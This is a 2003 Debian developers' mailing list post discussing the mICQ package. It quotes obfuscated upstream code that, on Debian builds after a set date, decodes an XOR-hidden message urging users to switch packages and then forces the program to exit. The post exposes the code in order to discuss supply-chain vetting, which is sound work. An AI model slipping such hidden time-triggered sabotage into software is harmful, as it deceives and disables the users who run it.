
Re: Proposal for removal of mICQ package



[Ruediger, Joerg, cc'ed for your convenience since you're mentioned by
 name and may wish to respond]

On Thu, Feb 13, 2003 at 04:14:20PM +0100, Martin Loschwitz wrote:
> Again, this "easter egg" is debian specific - it will only occur on computers
> running Debian and using the official Debian mICQ package.

So, basically, what you're saying is that you uploaded a package to Debian
that included some malicious and obfuscated code from upstream, that
neither you nor your sponsor (Joerg Jaspert according to the signature
on the .changes; who appears to be Ruediger's AM too) spotted. The code
in question, for those playing along at home, is (with minor reformatting
to fit into 80 cols):

#if defined(__Dbn__) && __Dbn__ != -1 && !defined (EXTRAVERSION)
  if (me[0] != 'm' || me[1] != 'a' || me[2] != 'd' || me[3] != 'k' ||
      me[4] != 'i' || me[5] != 's' || me[6] != 's' || me[7])
  if (time (NULL) > 1045000000)
  {
      const char *parts[] = {
                    "\n\n\eX0282nZlv$qf#vpjmd#wkf#nJ@R#sb`hbdf#sqlujgfg#az",
                    "#Gfajbm-#Pjm`f#wkf#Gfajbm#nbjmwbjmfq#jp#f{wqfnfoz#",
                    "vm`llsfqbwjuf/#zlv$qf#bguj`fg#wl#vpf#wkf#afwwfq#rv",
                    "bojwz#sb`hbdf#eqln#nj`r-lqd-#Pjnsoz#bgg#wkf#eloolt",
                    "jmd#ojmf#wl#zlvq#,fw`,bsw,plvq`fp-ojpw#wl#wqb`h#pw",
                    "baof#ufqpjlmp#le#nJ@R9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd",
                    ",gfajbm#pwbaof#nbjm\n\eX0282nWl#wqb`h#@UP#pmbspklwp/",
                    "#bgg9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd,gfajbm#wfpwjmd#n",
                    "bjm\n\eX0282nPlvq`f#sb`hbdfp#nbz#af#qfwqjfufg#pjnjob",
                    "qoz-\eX3n\n\n                                        " };

      char buf[52];
      int i, j;
                
      for (i = 0; i < 10; i++)
      {
          for (j = 0; j < 50; j++)
              buf[j] = parts[i][j] > 30 ? parts[i][j] ^ 3 : parts[i][j];
          buf[j] = '\0';
          M_print (buf);
      }
      exit (99);
  }
#endif

Given the recent spate of exploits of upstream ftp sites and security
problems with CVS, and so forth, that this has happened seems fairly
concerning to me.

> In my opinion, with this step, mICQ has proven as dishonorable to be
> distributed with Debian anymore (especially since nobody knows what idea
> upstream will have as next, maybe it's a very funny 'rm -rf /'?). Thus, I
> would like to request removal of the package from distribution.

As maintainer of the package, you don't have to give any reasons for
requesting its removal.

> Additionally, I suggest to consider to add this piece of software to the
> "unable to package" list[1].

On the other hand, this makes no sense at all. The package doesn't have
intractable security holes, or license problems, and the bugs that've
gotten us into this mess are all trivial to fix. From what I've read of
his posts, the upstream author doesn't even seem particularly unreasonable
in any of his demands, or even particularly more obnoxious than various
other people around the place.

So anyway, as a new maintainer candidate who's apparently already passed
the various checks, what are your thoughts on:

	(a) avoiding packages that've been trojaned upstream entering
	    Debian, either through a Debian maintainer or via the
	    sponsorship system?

	(b) how to best interact with upstream maintainers that can get
	    exceedingly obnoxious?

Personally, "drop any and all packages that these could affect" seems
like a pretty poor solution, both in that it loses the most functionality
of all possible solutions, and in that it can only be done after the fact.

Cheers,
aj

-- 
Anthony Towns <aj@humbug.org.au> <http://azure.humbug.org.au/~aj/>
I don't speak for anyone save myself. GPG signed mail preferred.

  ``Dear Anthony Towns: [...] Congratulations -- 
        you are now certified as a Red Hat Certified Engineer!''
